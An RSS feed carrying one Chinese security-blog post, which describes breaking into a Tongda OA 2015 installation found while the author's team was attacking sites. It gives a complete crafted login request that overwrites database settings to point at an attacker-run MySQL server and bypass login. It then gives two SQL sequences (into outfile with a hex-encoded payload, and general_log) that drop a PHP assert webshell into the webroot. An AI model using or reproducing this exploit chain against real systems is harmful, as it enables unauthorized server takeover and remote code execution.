<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>OA &#8211; ChaBug安全</title>
	<atom:link href="/tags/oa/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Fri, 23 Aug 2019 01:23:28 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>记通达OA2015变量覆盖和getshell</title>
		<link>/web/515.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Thu, 09 Aug 2018 05:17:58 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[getshell]]></category>
		<category><![CDATA[OA]]></category>
		<category><![CDATA[变量覆盖]]></category>
		<category><![CDATA[渗透]]></category>
		<category><![CDATA[漏洞]]></category>
		<guid isPermaLink="false">/?p=515</guid>

					<description><![CDATA[漏洞详情：http://www.anquan.us/static/bugs/wooyun-2016-0168661.html 团队一起日站的时候发现了一个oa，然后就一顿乌云找到了...]]></description>
										<content:encoded><![CDATA[<p><span class="wpcom_tag_link"><a href="/tags/%e6%bc%8f%e6%b4%9e" title="漏洞" target="_blank">漏洞</a></span>详情：<a href="http://www.anquan.us/static/bugs/wooyun-2016-0168661.html" target="_blank" rel="noopener noreferrer">http://www.anquan.us/static/bugs/wooyun-2016-0168661.html</a></p>
<p>团队一起日站的时候发现了一个oa，然后就一顿乌云找到了这个，成功<span class="wpcom_tag_link"><a href="/tags/getshell" title="getshell" target="_blank">getshell</a></span>。</p>
<h1><span class="wpcom_tag_link"><a href="/tags/%e5%8f%98%e9%87%8f%e8%a6%86%e7%9b%96" title="变量覆盖" target="_blank">变量覆盖</a></span></h1>
<p>登录构造请求数据包</p>
<pre class="lang:default decode:true ">POST /logincheck.php HTTP/1.1
Host: xx.xx.com
Content-Length: 182
Cache-Control: max-age=0
Origin: http://xx.xx.com/
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xx.xx.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: SID_1=8b3cb1d3; PHPSESSID=he68espbvu9oq0rgamruvhs114
Connection: close

USERNAME=admin&amp;PASSWORD=&amp;MYOA_MASTER_DB[id]=1&amp;MYOA_MASTER_DB[host]=123.123.123.123&amp;MYOA_MASTER_DB[user]=root&amp;MYOA_MASTER_DB[pwd]=rootpassword&amp;MYOA_MASTER_DB[db]=oa&amp;encode_type=1&amp;button=
</pre>
<p>其中的MySQL数据库链接配置需要自己搭建外网MySQL，并且开通root外链。</p>
<p><a href="https://pan.chabug.org/%E4%B8%8B%E8%BD%BD/TD_OA.zip">TD_OA.sql</a> 下载导入</p>
<p>&nbsp;</p>
<h1>getshell</h1>
<p>后台有 sql 导入功能, 有两种方法, 使用 <code>into outfile</code> 或者用 <code>general_log</code></p>
<pre class="lang:default decode:true ">update mysql.user set file_priv='Y' where user='root';
flush privileges;
select concat("'",0x3C3F7068702061737365727428245F504F53545B615D29203F3E) into outfile '../webroot/test.php';
update mysql.user set file_priv='N' where user='root';
flush privileges;</pre>
<pre class="lang:default decode:true">set global general_log = on;
set global general_log_file = '../webroot/test.php';
select '&lt;?php assert($_POST[a]) ?&gt;';
set global general_log = off;</pre>
<p>&nbsp;</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
